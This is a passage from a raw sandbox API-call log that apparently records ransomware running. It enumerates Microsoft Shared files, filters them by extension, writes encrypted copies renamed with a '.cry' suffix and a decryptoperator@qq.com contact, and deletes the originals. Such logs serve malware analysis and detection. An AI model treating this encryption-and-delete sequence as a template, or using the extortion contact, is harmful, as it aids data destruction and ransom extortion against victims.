[0042.723] lstrlenW (lpString=".zip") returned 4 [0042.723] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.723] lstrlenW (lpString=".rar") returned 4 [0042.723] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.723] lstrlenW (lpString=".bz2") returned 4 [0042.723] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.723] lstrlenW (lpString=".7z") returned 3 [0042.723] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.723] lstrlenW (lpString=".dbf") returned 4 [0042.723] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.723] lstrlenW (lpString=".1cd") returned 4 [0042.723] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned 69 [0042.723] lstrlenW (lpString=".jpg") returned 4 [0042.723] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.723] lstrcmpiW (lpString1=".emf", lpString2=".cry") returned 1 [0042.723] lstrlenW (lpString="Genko_2.emf") returned 11 [0042.724] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0042.724] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=10340) returned 1 [0042.724] CloseHandle (hObject=0x1bc) returned 1 [0042.724] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf")) returned 0x20 [0042.724] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.724] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0042.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.724] lstrlenW (lpString=".doc") returned 4 [0042.724] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.724] lstrlenW (lpString=".docx") returned 5 [0042.724] lstrcmpiW (lpString1=".docx", lpString2="2.emf") returned -1 [0042.724] lstrlenW (lpString=".pdf") returned 4 [0042.724] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.724] lstrlenW (lpString=".xls") returned 4 [0042.724] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.724] lstrlenW (lpString=".xlsx") returned 5 [0042.724] lstrcmpiW (lpString1=".xlsx", lpString2="2.emf") returned -1 [0042.724] lstrlenW (lpString=".ppt") returned 4 [0042.724] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.724] lstrlenW (lpString=".zip") returned 4 [0042.724] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.724] lstrlenW (lpString=".rar") returned 4 [0042.725] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.725] lstrlenW (lpString=".bz2") returned 4 [0042.725] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.725] lstrlenW (lpString=".7z") returned 3 [0042.725] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.725] lstrlenW (lpString=".dbf") returned 4 [0042.725] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.725] lstrlenW (lpString=".1cd") returned 4 [0042.725] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.725] lstrlenW (lpString=".jpg") returned 4 [0042.725] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.725] lstrlenW (lpString=".doc") returned 4 [0042.725] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0042.725] lstrlenW (lpString=".docx") returned 5 [0042.725] lstrcmpiW (lpString1=".docx", lpString2="2.emf") returned -1 [0042.725] lstrlenW (lpString=".pdf") returned 4 [0042.725] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0042.725] lstrlenW (lpString=".xls") returned 4 [0042.725] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0042.725] lstrlenW (lpString=".xlsx") returned 5 [0042.725] lstrcmpiW (lpString1=".xlsx", lpString2="2.emf") returned -1 [0042.725] lstrlenW (lpString=".ppt") returned 4 [0042.725] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0042.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.725] lstrlenW (lpString=".zip") returned 4 [0042.725] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0042.725] lstrlenW (lpString=".rar") returned 4 [0042.726] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0042.726] lstrlenW (lpString=".bz2") returned 4 [0042.726] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0042.726] lstrlenW (lpString=".7z") returned 3 [0042.726] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0042.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.726] lstrlenW (lpString=".dbf") returned 4 [0042.726] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0042.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.726] lstrlenW (lpString=".1cd") returned 4 [0042.726] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1 [0042.726] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_2.emf") returned 69 [0042.726] lstrlenW (lpString=".jpg") returned 4 [0042.726] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1 [0042.726] lstrcmpiW (lpString1=".emf", lpString2=".cry") returned 1 [0042.726] lstrlenW (lpString="Graph.emf") returned 9 [0042.726] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0043.672] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=116724) returned 1 [0043.672] CloseHandle (hObject=0x190) returned 1 [0043.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf")) returned 0x20 [0043.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\graph.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.673] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0043.673] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0043.673] lstrlenW (lpString=".doc") returned 4 [0043.673] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0043.673] lstrlenW (lpString=".docx") returned 5 [0043.673] lstrcmpiW (lpString1=".docx", lpString2="h.emf") returned -1 [0043.673] lstrlenW (lpString=".pdf") returned 4 [0043.673] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0043.673] lstrlenW (lpString=".xls") returned 4 [0043.673] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0043.673] lstrlenW (lpString=".xlsx") returned 5 [0043.673] lstrcmpiW (lpString1=".xlsx", lpString2="h.emf") returned -1 [0043.673] lstrlenW (lpString=".ppt") returned 4 [0043.673] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0043.673] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0043.673] lstrlenW (lpString=".zip") returned 4 [0043.673] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0043.673] lstrlenW (lpString=".rar") returned 4 [0043.673] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0043.673] lstrlenW (lpString=".bz2") returned 4 [0043.673] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0043.673] lstrlenW (lpString=".7z") returned 3 [0043.673] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0043.673] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Graph.emf") returned 67 [0043.673] lstrlenW (lpString=".dbf") returned 4 [0043.673] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0044.110] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.110] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.110] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.448] GetLastError () returned 0x0 [0044.448] ReadFile (in: hFile=0x1b8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0xba9, lpOverlapped=0x0) returned 1 [0044.467] WriteFile (in: hFile=0x1f8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xbb0, lpOverlapped=0x0) returned 1 [0044.468] ReadFile (in: hFile=0x1b8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.468] WriteFile (in: hFile=0x1f8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.468] SetEndOfFile (hFile=0x1f8) returned 1 [0044.468] CloseHandle (hObject=0x1f8) returned 1 [0044.468] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.468] SetEndOfFile (hFile=0x1b8) returned 1 [0044.469] CloseHandle (hObject=0x1b8) returned 1 [0044.469] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.469] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif")) returned 1 [0044.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.470] lstrlenW (lpString=".doc") returned 4 [0044.470] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.470] lstrlenW (lpString=".docx") returned 5 [0044.470] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.470] lstrlenW (lpString=".pdf") returned 4 [0044.470] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.470] lstrlenW (lpString=".xls") returned 4 [0044.470] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.470] lstrlenW (lpString=".xlsx") returned 5 [0044.470] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.470] lstrlenW (lpString=".ppt") returned 4 [0044.470] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.470] lstrlenW (lpString=".zip") returned 4 [0044.470] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.470] lstrlenW (lpString=".rar") returned 4 [0044.470] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.470] lstrlenW (lpString=".bz2") returned 4 [0044.470] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.470] lstrlenW (lpString=".7z") returned 3 [0044.470] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.470] lstrlenW (lpString=".dbf") returned 4 [0044.470] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.470] lstrlenW (lpString=".1cd") returned 4 [0044.470] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.470] lstrlenW (lpString=".jpg") returned 4 [0044.470] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.470] lstrlenW (lpString=".doc") returned 4 [0044.470] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.471] lstrlenW (lpString=".docx") returned 5 [0044.471] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.471] lstrlenW (lpString=".pdf") returned 4 [0044.471] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.471] lstrlenW (lpString=".xls") returned 4 [0044.471] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.471] lstrlenW (lpString=".xlsx") returned 5 [0044.471] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.471] lstrlenW (lpString=".ppt") returned 4 [0044.471] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.471] lstrlenW (lpString=".zip") returned 4 [0044.471] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.471] lstrlenW (lpString=".rar") returned 4 [0044.471] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.471] lstrlenW (lpString=".bz2") returned 4 [0044.471] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.471] lstrlenW (lpString=".7z") returned 3 [0044.471] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.471] lstrlenW (lpString=".dbf") returned 4 [0044.471] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.471] lstrlenW (lpString=".1cd") returned 4 [0044.471] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 74 [0044.471] lstrlenW (lpString=".jpg") returned 4 [0044.471] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.471] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0044.471] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.471] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0044.472] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=945) returned 1 [0044.472] CloseHandle (hObject=0x1b8) returned 1 [0044.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif")) returned 0x20 [0044.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.472] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0044.472] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.472] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.472] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.477] GetLastError () returned 0x0 [0044.477] ReadFile (in: hFile=0x1b8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x3b1, lpOverlapped=0x0) returned 1 [0044.492] WriteFile (in: hFile=0x1f8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x3c0, lpOverlapped=0x0) returned 1 [0044.493] ReadFile (in: hFile=0x1b8, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0044.493] WriteFile (in: hFile=0x1f8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.494] SetEndOfFile (hFile=0x1f8) returned 1 [0044.494] CloseHandle (hObject=0x1f8) returned 1 [0044.494] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0044.494] SetEndOfFile (hFile=0x1b8) returned 1 [0044.495] CloseHandle (hObject=0x1b8) returned 1 [0044.495] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.495] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\preview.gif")) returned 1 [0044.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.495] lstrlenW (lpString=".doc") returned 4 [0044.495] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.495] lstrlenW (lpString=".docx") returned 5 [0044.495] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.495] lstrlenW (lpString=".pdf") returned 4 [0044.495] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.495] lstrlenW (lpString=".xls") returned 4 [0044.495] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.495] lstrlenW (lpString=".xlsx") returned 5 [0044.495] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.495] lstrlenW (lpString=".ppt") returned 4 [0044.495] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.495] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.495] lstrlenW (lpString=".zip") returned 4 [0044.495] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.496] lstrlenW (lpString=".rar") returned 4 [0044.496] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.496] lstrlenW (lpString=".bz2") returned 4 [0044.496] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.496] lstrlenW (lpString=".7z") returned 3 [0044.496] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.496] lstrlenW (lpString=".dbf") returned 4 [0044.496] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.496] lstrlenW (lpString=".1cd") returned 4 [0044.496] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.496] lstrlenW (lpString=".jpg") returned 4 [0044.496] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.496] lstrlenW (lpString=".doc") returned 4 [0044.496] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.496] lstrlenW (lpString=".docx") returned 5 [0044.496] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.496] lstrlenW (lpString=".pdf") returned 4 [0044.496] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.496] lstrlenW (lpString=".xls") returned 4 [0044.496] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.496] lstrlenW (lpString=".xlsx") returned 5 [0044.496] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.496] lstrlenW (lpString=".ppt") returned 4 [0044.496] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.496] lstrlenW (lpString=".zip") returned 4 [0044.496] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.496] lstrlenW (lpString=".rar") returned 4 [0044.496] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.496] lstrlenW (lpString=".bz2") returned 4 [0044.496] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.496] lstrlenW (lpString=".7z") returned 3 [0044.497] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.497] lstrlenW (lpString=".dbf") returned 4 [0044.497] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.497] lstrlenW (lpString=".1cd") returned 4 [0044.497] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\PREVIEW.GIF") returned 74 [0044.497] lstrlenW (lpString=".jpg") returned 4 [0044.497] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.497] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0044.497] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.497] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), 